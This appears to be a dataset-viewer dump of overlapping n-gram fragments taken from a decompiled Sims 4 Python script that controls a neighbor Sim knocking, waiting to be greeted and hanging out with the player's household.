ngram
listlengths 0
67.8k
|
|---|
[
"= early_exit_loot self._early_exit_notification = early_exit_notification def _on_interaction_of_interest_complete(self, **kwargs): self._change_state(self.owner._hangout_state()) def timer_expired(self): for sim_info",
"self._neighbor_sim = sim @classmethod def get_predefined_guest_list(cls): active_sim_info = services.active_sim_info() neighbor_sim_id = cls._get_neighbor() if",
"of loot to apply between the neighbor and the active\\n household Sims if",
"', locked_args={'allow_join_situation': True}), '_hangout_state':_NeighborHangoutState.TunableFactory(description='\\n Situation state for the Sim to hang out for",
"'allow_join_situation':True}), '_wait_to_be_greeted':_NeighborWaitToBeGreetedState.TunableFactory(description='\\n Situation State for the Sim to wait to be greeted.\\n ',",
"wait to be greeted.\\n ', locked_args={'allow_join_situation': True}), '_hangout_state':_NeighborHangoutState.TunableFactory(description='\\n Situation state for the Sim",
"'_resident_job', '_relationship_between_job_members', 'audio_sting_on_start', 'force_invite_only', 'screen_slam_gold', 'screen_slam_silver', 'screen_slam_bronze', 'screen_slam_no_medal') + Situation.SITUATION_START_FROM_UI_REMOVE_INSTANCE_TUNABLES + Situation.SITUATION_USER_FACING_REMOVE_INSTANCE_TUNABLES @classmethod",
"= sim @classmethod def get_predefined_guest_list(cls): active_sim_info = services.active_sim_info() neighbor_sim_id = cls._get_neighbor() if neighbor_sim_id",
"23:17:14 # Size of source mod 2**32: 9737 bytes import random from event_testing.resolver",
"+ Situation.SITUATION_START_FROM_UI_REMOVE_INSTANCE_TUNABLES + Situation.SITUATION_USER_FACING_REMOVE_INSTANCE_TUNABLES @classmethod def _states(cls): return (SituationStateData(1, _StartSituationState), SituationStateData(2, _KnockOnDoorState, factory=(cls._knock_on_door_state)),",
"return [(cls._starting_neighbor_job_and_role_state.job, cls._starting_neighbor_job_and_role_state.role_state)] @classmethod def default_job(cls): pass def __init__(self, *args, **kwargs): (super().__init__)(*args, **kwargs)",
"'audio_sting_on_start', 'force_invite_only', 'screen_slam_gold', 'screen_slam_silver', 'screen_slam_bronze', 'screen_slam_no_medal') + Situation.SITUATION_START_FROM_UI_REMOVE_INSTANCE_TUNABLES + Situation.SITUATION_USER_FACING_REMOVE_INSTANCE_TUNABLES @classmethod def _states(cls):",
"to knock on the door.\\n ', locked_args={'time_out':None, 'allow_join_situation':True}), '_wait_to_be_greeted':_NeighborWaitToBeGreetedState.TunableFactory(description='\\n Situation State for the",
"class _StartSituationState(SituationState): def _on_set_sim_role_state(self, sim, *args, **kwargs): (super()._on_set_sim_role_state)(sim, *args, **kwargs) relationship_tracker = sim.sim_info.relationship_tracker",
"(super().__init__)(*args, **kwargs) self._early_exit_loot = early_exit_loot self._early_exit_notification = early_exit_notification def _on_interaction_of_interest_complete(self, **kwargs): self._change_state(self.owner._hangout_state()) def",
"neighbor_sim_id = random.choice(neighbor_sim_infos_at_home).sim_id if neighbor_sim_infos_at_home else None return neighbor_sim_id def start_situation(self): super().start_situation() self._change_state(_StartSituationState())",
"Sim to wait to be greeted.\\n ', locked_args={'allow_join_situation': True}), '_hangout_state':_NeighborHangoutState.TunableFactory(description='\\n Situation state for",
"# Decompiled from: Python 3.7.9 (tags/v3.7.9:13c94747c7, Aug 17 2020, 18:58:18) [MSC v.1900 64",
"'screen_slam_gold', 'screen_slam_silver', 'screen_slam_bronze', 'screen_slam_no_medal') + Situation.SITUATION_START_FROM_UI_REMOVE_INSTANCE_TUNABLES + Situation.SITUATION_USER_FACING_REMOVE_INSTANCE_TUNABLES @classmethod def _states(cls): return (SituationStateData(1,",
"import TunableUiDialogNotificationSnippet import services class _StartSituationState(SituationState): def _on_set_sim_role_state(self, sim, *args, **kwargs): (super()._on_set_sim_role_state)(sim, *args,",
"to hang out for a while.\\n ', locked_args={'allow_join_situation': True}), '_starting_neighbor_job_and_role_state':TunableSituationJobAndRoleState(description='\\n Job and Role",
"LootActions from relationships.global_relationship_tuning import RelationshipGlobalTuning from sims4.tuning.instances import lock_instance_tunables from sims4.tuning.tunable import TunableList",
"= None def _on_set_sim_job(self, sim, job_type): super()._on_set_sim_job(sim, job_type) self._neighbor_sim = sim @classmethod def",
"*args, early_exit_loot=tuple(), early_exit_notification=None, **kwargs): (super().__init__)(*args, **kwargs) self._early_exit_loot = early_exit_loot self._early_exit_notification = early_exit_notification def",
"# Embedded file name: T:\\InGame\\Gameplay\\Scripts\\Server\\apartments\\situations\\neighbor_react_to_you_situation.py # Compiled at: 2018-07-22 23:17:14 # Size of",
"9737 bytes import random from event_testing.resolver import DoubleSimResolver from interactions.utils.loot import LootActions from",
"= random.choice(neighbor_sim_infos_at_home).sim_id if neighbor_sim_infos_at_home else None return neighbor_sim_id def start_situation(self): super().start_situation() self._change_state(_StartSituationState()) lock_instance_tunables(NeighborReactToYouSituation,",
"**kwargs): (super().__init__)(*args, **kwargs) self._early_exit_loot = early_exit_loot self._early_exit_notification = early_exit_notification def _on_interaction_of_interest_complete(self, **kwargs): self._change_state(self.owner._hangout_state())",
"SituationState from situations.situation_guest_list import SituationGuestInfo, SituationGuestList from situations.situation_types import SituationCreationUIOption from ui.ui_dialog_notification import",
"'_relationship_between_job_members', 'audio_sting_on_start', 'force_invite_only', 'screen_slam_gold', 'screen_slam_silver', 'screen_slam_bronze', 'screen_slam_no_medal') + Situation.SITUATION_START_FROM_UI_REMOVE_INSTANCE_TUNABLES + Situation.SITUATION_USER_FACING_REMOVE_INSTANCE_TUNABLES @classmethod def",
"sim_info in services.active_household(): resolver = DoubleSimResolver(sim_info, self.owner._neighbor_sim.sim_info) for loot_action in self._early_exit_loot: loot_action.apply_to_resolver(resolver) resolver",
"sims4.tuning.tunable import TunableList from situations.bouncer.bouncer_types import BouncerExclusivityCategory, RequestSpawningOption, BouncerRequestPriority from situations.situation import Situation",
"*args, **kwargs) relationship_tracker = sim.sim_info.relationship_tracker for sim_info in services.active_household(): if relationship_tracker.has_bit(sim_info.sim_id, RelationshipGlobalTuning.NEIGHBOR_GIVEN_KEY_RELATIONSHIP_BIT): self._change_state(self.owner._hangout_state())",
"SituationStateData, CommonInteractionCompletedSituationState, SituationState from situations.situation_guest_list import SituationGuestInfo, SituationGuestList from situations.situation_types import SituationCreationUIOption from",
"source mod 2**32: 9737 bytes import random from event_testing.resolver import DoubleSimResolver from interactions.utils.loot",
"for the Sim to knock on the door.\\n ', locked_args={'time_out':None, 'allow_join_situation':True}), '_wait_to_be_greeted':_NeighborWaitToBeGreetedState.TunableFactory(description='\\n Situation",
"[(cls._starting_neighbor_job_and_role_state.job, cls._starting_neighbor_job_and_role_state.role_state)] @classmethod def default_job(cls): pass def __init__(self, *args, **kwargs): (super().__init__)(*args, **kwargs) self._neighbor_sim",
"= [result.sim_info for result in neighbors if result.sim_info.is_at_home] neighbor_sim_id = random.choice(neighbor_sim_infos_at_home).sim_id if neighbor_sim_infos_at_home",
"self.owner._neighbor_sim.sim_info) early_exit_notification = self._early_exit_notification((services.active_sim_info()), resolver=resolver) early_exit_notification.show_dialog() self.owner._self_destruct() class _NeighborHangoutState(CommonSituationState): def timer_expired(self): self.owner._self_destruct() class",
"Size of source mod 2**32: 9737 bytes import random from event_testing.resolver import DoubleSimResolver",
"INSTANCE_TUNABLES = {'_knock_on_door_state':_KnockOnDoorState.TunableFactory(description='\\n Situation State for the Sim to knock on the door.\\n",
"self.owner._self_destruct() class _NeighborHangoutState(CommonSituationState): def timer_expired(self): self.owner._self_destruct() class NeighborReactToYouSituation(SituationComplexCommon): INSTANCE_TUNABLES = {'_knock_on_door_state':_KnockOnDoorState.TunableFactory(description='\\n Situation State",
"# Size of source mod 2**32: 9737 bytes import random from event_testing.resolver import",
"State for the Sim to knock on the door.\\n ', locked_args={'time_out':None, 'allow_join_situation':True}), '_wait_to_be_greeted':_NeighborWaitToBeGreetedState.TunableFactory(description='\\n",
"bytes import random from event_testing.resolver import DoubleSimResolver from interactions.utils.loot import LootActions from relationships.global_relationship_tuning",
"locked_args={'allow_join_situation': True}), '_hangout_state':_NeighborHangoutState.TunableFactory(description='\\n Situation state for the Sim to hang out for a",
"RelationshipGlobalTuning from sims4.tuning.instances import lock_instance_tunables from sims4.tuning.tunable import TunableList from situations.bouncer.bouncer_types import BouncerExclusivityCategory,",
"services.active_household(): resolver = DoubleSimResolver(sim_info, self.owner._neighbor_sim.sim_info) for loot_action in self._early_exit_loot: loot_action.apply_to_resolver(resolver) resolver = DoubleSimResolver(services.active_sim_info(),",
"Sim to knock on the door.\\n ', locked_args={'time_out':None, 'allow_join_situation':True}), '_wait_to_be_greeted':_NeighborWaitToBeGreetedState.TunableFactory(description='\\n Situation State for",
"not neighbors: return neighbor_sim_infos_at_home = [result.sim_info for result in neighbors if result.sim_info.is_at_home] neighbor_sim_id",
"from situations.situation_complex import SituationComplexCommon, TunableSituationJobAndRoleState, CommonSituationState, SituationStateData, CommonInteractionCompletedSituationState, SituationState from situations.situation_guest_list import SituationGuestInfo,",
"services.active_sim_info() neighbors = services.sim_filter_service().submit_filter((cls._starting_neighbor_job_and_role_state.job.filter), callback=None, requesting_sim_info=active_sim_info, allow_yielding=False, blacklist_sim_ids={sim_info.sim_id for sim_info in services.active_household()}, gsi_source_fn=(cls.get_sim_filter_gsi_name))",
"stiuation state times out.\\n ', tunable=LootActions.TunableReference(description='\\n A loot action applied to all of",
"is None: return guest_list = SituationGuestList(invite_only=True, host_sim_id=neighbor_sim_id, filter_requesting_sim_id=(active_sim_info.sim_id)) guest_list.add_guest_info(SituationGuestInfo(neighbor_sim_id, (cls._starting_neighbor_job_and_role_state.job), (RequestSpawningOption.DONT_CARE), (BouncerRequestPriority.BACKGROUND_MEDIUM), expectation_preference=True))",
"TunableSituationJobAndRoleState, CommonSituationState, SituationStateData, CommonInteractionCompletedSituationState, SituationState from situations.situation_guest_list import SituationGuestInfo, SituationGuestList from situations.situation_types import",
"BouncerRequestPriority from situations.situation import Situation from situations.situation_complex import SituationComplexCommon, TunableSituationJobAndRoleState, CommonSituationState, SituationStateData, CommonInteractionCompletedSituationState,",
"# Python bytecode 3.7 (3394) # Decompiled from: Python 3.7.9 (tags/v3.7.9:13c94747c7, Aug 17",
"will be shown when this situation state times\\n out.\\n ')} def __init__(self, *args,",
"times out.\\n ')), 'early_exit_notification':TunableUiDialogNotificationSnippet(description='\\n Notification that will be shown when this situation state",
"mod 2**32: 9737 bytes import random from event_testing.resolver import DoubleSimResolver from interactions.utils.loot import",
"from situations.situation_types import SituationCreationUIOption from ui.ui_dialog_notification import TunableUiDialogNotificationSnippet import services class _StartSituationState(SituationState): def",
"= services.active_sim_info() neighbors = services.sim_filter_service().submit_filter((cls._starting_neighbor_job_and_role_state.job.filter), callback=None, requesting_sim_info=active_sim_info, allow_yielding=False, blacklist_sim_ids={sim_info.sim_id for sim_info in services.active_household()},",
"resolver = DoubleSimResolver(services.active_sim_info(), self.owner._neighbor_sim.sim_info) early_exit_notification = self._early_exit_notification((services.active_sim_info()), resolver=resolver) early_exit_notification.show_dialog() self.owner._self_destruct() class _NeighborHangoutState(CommonSituationState): def",
"Situation state for the Sim to hang out for a while.\\n ', locked_args={'allow_join_situation':",
"active household Sims if this\\n situation state times out.\\n ')), 'early_exit_notification':TunableUiDialogNotificationSnippet(description='\\n Notification that",
"from sims4.tuning.tunable import TunableList from situations.bouncer.bouncer_types import BouncerExclusivityCategory, RequestSpawningOption, BouncerRequestPriority from situations.situation import",
"in services.active_household(): resolver = DoubleSimResolver(sim_info, self.owner._neighbor_sim.sim_info) for loot_action in self._early_exit_loot: loot_action.apply_to_resolver(resolver) resolver =",
"neighbor.\\n ')} REMOVE_INSTANCE_TUNABLES = ('_buff', 'targeted_situation', '_resident_job', '_relationship_between_job_members', 'audio_sting_on_start', 'force_invite_only', 'screen_slam_gold', 'screen_slam_silver', 'screen_slam_bronze',",
"that will be shown when this situation state times\\n out.\\n ')} def __init__(self,",
"T:\\InGame\\Gameplay\\Scripts\\Server\\apartments\\situations\\neighbor_react_to_you_situation.py # Compiled at: 2018-07-22 23:17:14 # Size of source mod 2**32: 9737",
"Compiled at: 2018-07-22 23:17:14 # Size of source mod 2**32: 9737 bytes import",
"**kwargs) self._early_exit_loot = early_exit_loot self._early_exit_notification = early_exit_notification def _on_interaction_of_interest_complete(self, **kwargs): self._change_state(self.owner._hangout_state()) def timer_expired(self):",
"_NeighborWaitToBeGreetedState, factory=(cls._wait_to_be_greeted)), SituationStateData(4, _NeighborHangoutState, factory=(cls._hangout_state))) @classmethod def _get_tuned_job_and_default_role_state_tuples(cls): return [(cls._starting_neighbor_job_and_role_state.job, cls._starting_neighbor_job_and_role_state.role_state)] @classmethod def",
"# uncompyle6 version 3.7.4 # Python bytecode 3.7 (3394) # Decompiled from: Python",
"_KnockOnDoorState(CommonInteractionCompletedSituationState): def _on_interaction_of_interest_complete(self, **kwargs): self._change_state(self.owner._wait_to_be_greeted()) class _NeighborWaitToBeGreetedState(CommonInteractionCompletedSituationState): FACTORY_TUNABLES = {'early_exit_loot':TunableList(description='\\n A list of",
"SituationStateData(4, _NeighborHangoutState, factory=(cls._hangout_state))) @classmethod def _get_tuned_job_and_default_role_state_tuples(cls): return [(cls._starting_neighbor_job_and_role_state.job, cls._starting_neighbor_job_and_role_state.role_state)] @classmethod def default_job(cls): pass",
"active\\n household Sims if this stiuation state times out.\\n ', tunable=LootActions.TunableReference(description='\\n A loot",
"Job and Role State for the neighbor.\\n ')} REMOVE_INSTANCE_TUNABLES = ('_buff', 'targeted_situation', '_resident_job',",
"timer_expired(self): for sim_info in services.active_household(): resolver = DoubleSimResolver(sim_info, self.owner._neighbor_sim.sim_info) for loot_action in self._early_exit_loot:",
"Situation from situations.situation_complex import SituationComplexCommon, TunableSituationJobAndRoleState, CommonSituationState, SituationStateData, CommonInteractionCompletedSituationState, SituationState from situations.situation_guest_list import",
"blacklist_sim_ids={sim_info.sim_id for sim_info in services.active_household()}, gsi_source_fn=(cls.get_sim_filter_gsi_name)) if not neighbors: return neighbor_sim_infos_at_home = [result.sim_info",
"')} REMOVE_INSTANCE_TUNABLES = ('_buff', 'targeted_situation', '_resident_job', '_relationship_between_job_members', 'audio_sting_on_start', 'force_invite_only', 'screen_slam_gold', 'screen_slam_silver', 'screen_slam_bronze', 'screen_slam_no_medal')",
"Python bytecode 3.7 (3394) # Decompiled from: Python 3.7.9 (tags/v3.7.9:13c94747c7, Aug 17 2020,",
"def _on_set_sim_role_state(self, sim, *args, **kwargs): (super()._on_set_sim_role_state)(sim, *args, **kwargs) relationship_tracker = sim.sim_info.relationship_tracker for sim_info",
"services.active_sim_info() neighbor_sim_id = cls._get_neighbor() if neighbor_sim_id is None: return guest_list = SituationGuestList(invite_only=True, host_sim_id=neighbor_sim_id,",
"def get_predefined_guest_list(cls): active_sim_info = services.active_sim_info() neighbor_sim_id = cls._get_neighbor() if neighbor_sim_id is None: return",
"SituationStateData(2, _KnockOnDoorState, factory=(cls._knock_on_door_state)), SituationStateData(3, _NeighborWaitToBeGreetedState, factory=(cls._wait_to_be_greeted)), SituationStateData(4, _NeighborHangoutState, factory=(cls._hangout_state))) @classmethod def _get_tuned_job_and_default_role_state_tuples(cls): return",
"from situations.situation_guest_list import SituationGuestInfo, SituationGuestList from situations.situation_types import SituationCreationUIOption from ui.ui_dialog_notification import TunableUiDialogNotificationSnippet",
"sim, job_type): super()._on_set_sim_job(sim, job_type) self._neighbor_sim = sim @classmethod def get_predefined_guest_list(cls): active_sim_info = services.active_sim_info()",
"__init__(self, *args, **kwargs): (super().__init__)(*args, **kwargs) self._neighbor_sim = None def _on_set_sim_job(self, sim, job_type): super()._on_set_sim_job(sim,",
"loot_action in self._early_exit_loot: loot_action.apply_to_resolver(resolver) resolver = DoubleSimResolver(services.active_sim_info(), self.owner._neighbor_sim.sim_info) early_exit_notification = self._early_exit_notification((services.active_sim_info()), resolver=resolver) early_exit_notification.show_dialog()",
"the active\\n household Sims if this stiuation state times out.\\n ', tunable=LootActions.TunableReference(description='\\n A",
"shown when this situation state times\\n out.\\n ')} def __init__(self, *args, early_exit_loot=tuple(), early_exit_notification=None,",
"3.7.4 # Python bytecode 3.7 (3394) # Decompiled from: Python 3.7.9 (tags/v3.7.9:13c94747c7, Aug",
"hang out for a while.\\n ', locked_args={'allow_join_situation': True}), '_starting_neighbor_job_and_role_state':TunableSituationJobAndRoleState(description='\\n Job and Role State",
"SituationGuestInfo, SituationGuestList from situations.situation_types import SituationCreationUIOption from ui.ui_dialog_notification import TunableUiDialogNotificationSnippet import services class",
"class _NeighborWaitToBeGreetedState(CommonInteractionCompletedSituationState): FACTORY_TUNABLES = {'early_exit_loot':TunableList(description='\\n A list of loot to apply between the",
"None def _on_set_sim_job(self, sim, job_type): super()._on_set_sim_job(sim, job_type) self._neighbor_sim = sim @classmethod def get_predefined_guest_list(cls):",
"for sim_info in services.active_household()}, gsi_source_fn=(cls.get_sim_filter_gsi_name)) if not neighbors: return neighbor_sim_infos_at_home = [result.sim_info for",
"if relationship_tracker.has_bit(sim_info.sim_id, RelationshipGlobalTuning.NEIGHBOR_GIVEN_KEY_RELATIONSHIP_BIT): self._change_state(self.owner._hangout_state()) return self._change_state(self.owner._knock_on_door_state()) class _KnockOnDoorState(CommonInteractionCompletedSituationState): def _on_interaction_of_interest_complete(self, **kwargs): self._change_state(self.owner._wait_to_be_greeted()) class",
"{'early_exit_loot':TunableList(description='\\n A list of loot to apply between the neighbor and the active\\n",
"def _on_set_sim_job(self, sim, job_type): super()._on_set_sim_job(sim, job_type) self._neighbor_sim = sim @classmethod def get_predefined_guest_list(cls): active_sim_info",
"')} def __init__(self, *args, early_exit_loot=tuple(), early_exit_notification=None, **kwargs): (super().__init__)(*args, **kwargs) self._early_exit_loot = early_exit_loot self._early_exit_notification",
"'screen_slam_bronze', 'screen_slam_no_medal') + Situation.SITUATION_START_FROM_UI_REMOVE_INSTANCE_TUNABLES + Situation.SITUATION_USER_FACING_REMOVE_INSTANCE_TUNABLES @classmethod def _states(cls): return (SituationStateData(1, _StartSituationState), SituationStateData(2,",
"neighbors = services.sim_filter_service().submit_filter((cls._starting_neighbor_job_and_role_state.job.filter), callback=None, requesting_sim_info=active_sim_info, allow_yielding=False, blacklist_sim_ids={sim_info.sim_id for sim_info in services.active_household()}, gsi_source_fn=(cls.get_sim_filter_gsi_name)) if",
"**kwargs): self._change_state(self.owner._wait_to_be_greeted()) class _NeighborWaitToBeGreetedState(CommonInteractionCompletedSituationState): FACTORY_TUNABLES = {'early_exit_loot':TunableList(description='\\n A list of loot to apply",
"uncompyle6 version 3.7.4 # Python bytecode 3.7 (3394) # Decompiled from: Python 3.7.9",
"guest_list.add_guest_info(SituationGuestInfo(neighbor_sim_id, (cls._starting_neighbor_job_and_role_state.job), (RequestSpawningOption.DONT_CARE), (BouncerRequestPriority.BACKGROUND_MEDIUM), expectation_preference=True)) return guest_list @classmethod def _get_neighbor(cls): active_sim_info = services.active_sim_info()",
"State for the neighbor.\\n ')} REMOVE_INSTANCE_TUNABLES = ('_buff', 'targeted_situation', '_resident_job', '_relationship_between_job_members', 'audio_sting_on_start', 'force_invite_only',",
"True}), '_hangout_state':_NeighborHangoutState.TunableFactory(description='\\n Situation state for the Sim to hang out for a while.\\n",
"('_buff', 'targeted_situation', '_resident_job', '_relationship_between_job_members', 'audio_sting_on_start', 'force_invite_only', 'screen_slam_gold', 'screen_slam_silver', 'screen_slam_bronze', 'screen_slam_no_medal') + Situation.SITUATION_START_FROM_UI_REMOVE_INSTANCE_TUNABLES +",
"from interactions.utils.loot import LootActions from relationships.global_relationship_tuning import RelationshipGlobalTuning from sims4.tuning.instances import lock_instance_tunables from",
"in services.active_household(): if relationship_tracker.has_bit(sim_info.sim_id, RelationshipGlobalTuning.NEIGHBOR_GIVEN_KEY_RELATIONSHIP_BIT): self._change_state(self.owner._hangout_state()) return self._change_state(self.owner._knock_on_door_state()) class _KnockOnDoorState(CommonInteractionCompletedSituationState): def _on_interaction_of_interest_complete(self, **kwargs):",
"return guest_list = SituationGuestList(invite_only=True, host_sim_id=neighbor_sim_id, filter_requesting_sim_id=(active_sim_info.sim_id)) guest_list.add_guest_info(SituationGuestInfo(neighbor_sim_id, (cls._starting_neighbor_job_and_role_state.job), (RequestSpawningOption.DONT_CARE), (BouncerRequestPriority.BACKGROUND_MEDIUM), expectation_preference=True)) return guest_list",
"return self._change_state(self.owner._knock_on_door_state()) class _KnockOnDoorState(CommonInteractionCompletedSituationState): def _on_interaction_of_interest_complete(self, **kwargs): self._change_state(self.owner._wait_to_be_greeted()) class _NeighborWaitToBeGreetedState(CommonInteractionCompletedSituationState): FACTORY_TUNABLES = {'early_exit_loot':TunableList(description='\\n",
"*args, **kwargs): (super()._on_set_sim_role_state)(sim, *args, **kwargs) relationship_tracker = sim.sim_info.relationship_tracker for sim_info in services.active_household(): if",
"this\\n situation state times out.\\n ')), 'early_exit_notification':TunableUiDialogNotificationSnippet(description='\\n Notification that will be shown when",
"situation state times\\n out.\\n ')} def __init__(self, *args, early_exit_loot=tuple(), early_exit_notification=None, **kwargs): (super().__init__)(*args, **kwargs)",
"import lock_instance_tunables from sims4.tuning.tunable import TunableList from situations.bouncer.bouncer_types import BouncerExclusivityCategory, RequestSpawningOption, BouncerRequestPriority from",
"_on_set_sim_job(self, sim, job_type): super()._on_set_sim_job(sim, job_type) self._neighbor_sim = sim @classmethod def get_predefined_guest_list(cls): active_sim_info =",
"neighbors: return neighbor_sim_infos_at_home = [result.sim_info for result in neighbors if result.sim_info.is_at_home] neighbor_sim_id =",
"= early_exit_notification def _on_interaction_of_interest_complete(self, **kwargs): self._change_state(self.owner._hangout_state()) def timer_expired(self): for sim_info in services.active_household(): resolver",
"this stiuation state times out.\\n ', tunable=LootActions.TunableReference(description='\\n A loot action applied to all",
"# Compiled at: 2018-07-22 23:17:14 # Size of source mod 2**32: 9737 bytes",
"in self._early_exit_loot: loot_action.apply_to_resolver(resolver) resolver = DoubleSimResolver(services.active_sim_info(), self.owner._neighbor_sim.sim_info) early_exit_notification = self._early_exit_notification((services.active_sim_info()), resolver=resolver) early_exit_notification.show_dialog() self.owner._self_destruct()",
"_StartSituationState), SituationStateData(2, _KnockOnDoorState, factory=(cls._knock_on_door_state)), SituationStateData(3, _NeighborWaitToBeGreetedState, factory=(cls._wait_to_be_greeted)), SituationStateData(4, _NeighborHangoutState, factory=(cls._hangout_state))) @classmethod def _get_tuned_job_and_default_role_state_tuples(cls):",
"for result in neighbors if result.sim_info.is_at_home] neighbor_sim_id = random.choice(neighbor_sim_infos_at_home).sim_id if neighbor_sim_infos_at_home else None",
"job_type) self._neighbor_sim = sim @classmethod def get_predefined_guest_list(cls): active_sim_info = services.active_sim_info() neighbor_sim_id = cls._get_neighbor()",
"RequestSpawningOption, BouncerRequestPriority from situations.situation import Situation from situations.situation_complex import SituationComplexCommon, TunableSituationJobAndRoleState, CommonSituationState, SituationStateData,",
"self._neighbor_sim = None def _on_set_sim_job(self, sim, job_type): super()._on_set_sim_job(sim, job_type) self._neighbor_sim = sim @classmethod",
"v.1900 64 bit (AMD64)] # Embedded file name: T:\\InGame\\Gameplay\\Scripts\\Server\\apartments\\situations\\neighbor_react_to_you_situation.py # Compiled at: 2018-07-22",
"state for the Sim to hang out for a while.\\n ', locked_args={'allow_join_situation': True}),",
"if neighbor_sim_id is None: return guest_list = SituationGuestList(invite_only=True, host_sim_id=neighbor_sim_id, filter_requesting_sim_id=(active_sim_info.sim_id)) guest_list.add_guest_info(SituationGuestInfo(neighbor_sim_id, (cls._starting_neighbor_job_and_role_state.job), (RequestSpawningOption.DONT_CARE),",
"Aug 17 2020, 18:58:18) [MSC v.1900 64 bit (AMD64)] # Embedded file name:",
"neighbor_sim_infos_at_home = [result.sim_info for result in neighbors if result.sim_info.is_at_home] neighbor_sim_id = random.choice(neighbor_sim_infos_at_home).sim_id if",
"'targeted_situation', '_resident_job', '_relationship_between_job_members', 'audio_sting_on_start', 'force_invite_only', 'screen_slam_gold', 'screen_slam_silver', 'screen_slam_bronze', 'screen_slam_no_medal') + Situation.SITUATION_START_FROM_UI_REMOVE_INSTANCE_TUNABLES + Situation.SITUATION_USER_FACING_REMOVE_INSTANCE_TUNABLES",
"knock on the door.\\n ', locked_args={'time_out':None, 'allow_join_situation':True}), '_wait_to_be_greeted':_NeighborWaitToBeGreetedState.TunableFactory(description='\\n Situation State for the Sim",
"import SituationCreationUIOption from ui.ui_dialog_notification import TunableUiDialogNotificationSnippet import services class _StartSituationState(SituationState): def _on_set_sim_role_state(self, sim,",
"SituationComplexCommon, TunableSituationJobAndRoleState, CommonSituationState, SituationStateData, CommonInteractionCompletedSituationState, SituationState from situations.situation_guest_list import SituationGuestInfo, SituationGuestList from situations.situation_types",
"_get_tuned_job_and_default_role_state_tuples(cls): return [(cls._starting_neighbor_job_and_role_state.job, cls._starting_neighbor_job_and_role_state.role_state)] @classmethod def default_job(cls): pass def __init__(self, *args, **kwargs): (super().__init__)(*args,",
"early_exit_loot=tuple(), early_exit_notification=None, **kwargs): (super().__init__)(*args, **kwargs) self._early_exit_loot = early_exit_loot self._early_exit_notification = early_exit_notification def _on_interaction_of_interest_complete(self,",
"= services.active_sim_info() neighbor_sim_id = cls._get_neighbor() if neighbor_sim_id is None: return guest_list = SituationGuestList(invite_only=True,",
"active_sim_info = services.active_sim_info() neighbor_sim_id = cls._get_neighbor() if neighbor_sim_id is None: return guest_list =",
"sim_info in services.active_household(): if relationship_tracker.has_bit(sim_info.sim_id, RelationshipGlobalTuning.NEIGHBOR_GIVEN_KEY_RELATIONSHIP_BIT): self._change_state(self.owner._hangout_state()) return self._change_state(self.owner._knock_on_door_state()) class _KnockOnDoorState(CommonInteractionCompletedSituationState): def _on_interaction_of_interest_complete(self,",
"_NeighborHangoutState, factory=(cls._hangout_state))) @classmethod def _get_tuned_job_and_default_role_state_tuples(cls): return [(cls._starting_neighbor_job_and_role_state.job, cls._starting_neighbor_job_and_role_state.role_state)] @classmethod def default_job(cls): pass def",
"when this situation state times\\n out.\\n ')} def __init__(self, *args, early_exit_loot=tuple(), early_exit_notification=None, **kwargs):",
"from ui.ui_dialog_notification import TunableUiDialogNotificationSnippet import services class _StartSituationState(SituationState): def _on_set_sim_role_state(self, sim, *args, **kwargs):",
"for sim_info in services.active_household(): resolver = DoubleSimResolver(sim_info, self.owner._neighbor_sim.sim_info) for loot_action in self._early_exit_loot: loot_action.apply_to_resolver(resolver)",
"REMOVE_INSTANCE_TUNABLES = ('_buff', 'targeted_situation', '_resident_job', '_relationship_between_job_members', 'audio_sting_on_start', 'force_invite_only', 'screen_slam_gold', 'screen_slam_silver', 'screen_slam_bronze', 'screen_slam_no_medal') +",
"{'_knock_on_door_state':_KnockOnDoorState.TunableFactory(description='\\n Situation State for the Sim to knock on the door.\\n ', locked_args={'time_out':None,",
"@classmethod def default_job(cls): pass def __init__(self, *args, **kwargs): (super().__init__)(*args, **kwargs) self._neighbor_sim = None",
"super()._on_set_sim_job(sim, job_type) self._neighbor_sim = sim @classmethod def get_predefined_guest_list(cls): active_sim_info = services.active_sim_info() neighbor_sim_id =",
"bit (AMD64)] # Embedded file name: T:\\InGame\\Gameplay\\Scripts\\Server\\apartments\\situations\\neighbor_react_to_you_situation.py # Compiled at: 2018-07-22 23:17:14 #",
"filter_requesting_sim_id=(active_sim_info.sim_id)) guest_list.add_guest_info(SituationGuestInfo(neighbor_sim_id, (cls._starting_neighbor_job_and_role_state.job), (RequestSpawningOption.DONT_CARE), (BouncerRequestPriority.BACKGROUND_MEDIUM), expectation_preference=True)) return guest_list @classmethod def _get_neighbor(cls): active_sim_info =",
"import RelationshipGlobalTuning from sims4.tuning.instances import lock_instance_tunables from sims4.tuning.tunable import TunableList from situations.bouncer.bouncer_types import",
"class _KnockOnDoorState(CommonInteractionCompletedSituationState): def _on_interaction_of_interest_complete(self, **kwargs): self._change_state(self.owner._wait_to_be_greeted()) class _NeighborWaitToBeGreetedState(CommonInteractionCompletedSituationState): FACTORY_TUNABLES = {'early_exit_loot':TunableList(description='\\n A list",
"state times\\n out.\\n ')} def __init__(self, *args, early_exit_loot=tuple(), early_exit_notification=None, **kwargs): (super().__init__)(*args, **kwargs) self._early_exit_loot",
"of source mod 2**32: 9737 bytes import random from event_testing.resolver import DoubleSimResolver from",
"gsi_source_fn=(cls.get_sim_filter_gsi_name)) if not neighbors: return neighbor_sim_infos_at_home = [result.sim_info for result in neighbors if",
"result.sim_info.is_at_home] neighbor_sim_id = random.choice(neighbor_sim_infos_at_home).sim_id if neighbor_sim_infos_at_home else None return neighbor_sim_id def start_situation(self): super().start_situation()",
"RelationshipGlobalTuning.NEIGHBOR_GIVEN_KEY_RELATIONSHIP_BIT): self._change_state(self.owner._hangout_state()) return self._change_state(self.owner._knock_on_door_state()) class _KnockOnDoorState(CommonInteractionCompletedSituationState): def _on_interaction_of_interest_complete(self, **kwargs): self._change_state(self.owner._wait_to_be_greeted()) class _NeighborWaitToBeGreetedState(CommonInteractionCompletedSituationState): FACTORY_TUNABLES",
"cls._get_neighbor() if neighbor_sim_id is None: return guest_list = SituationGuestList(invite_only=True, host_sim_id=neighbor_sim_id, filter_requesting_sim_id=(active_sim_info.sim_id)) guest_list.add_guest_info(SituationGuestInfo(neighbor_sim_id, (cls._starting_neighbor_job_and_role_state.job),",
"from situations.situation import Situation from situations.situation_complex import SituationComplexCommon, TunableSituationJobAndRoleState, CommonSituationState, SituationStateData, CommonInteractionCompletedSituationState, SituationState",
"resolver=resolver) early_exit_notification.show_dialog() self.owner._self_destruct() class _NeighborHangoutState(CommonSituationState): def timer_expired(self): self.owner._self_destruct() class NeighborReactToYouSituation(SituationComplexCommon): INSTANCE_TUNABLES = {'_knock_on_door_state':_KnockOnDoorState.TunableFactory(description='\\n",
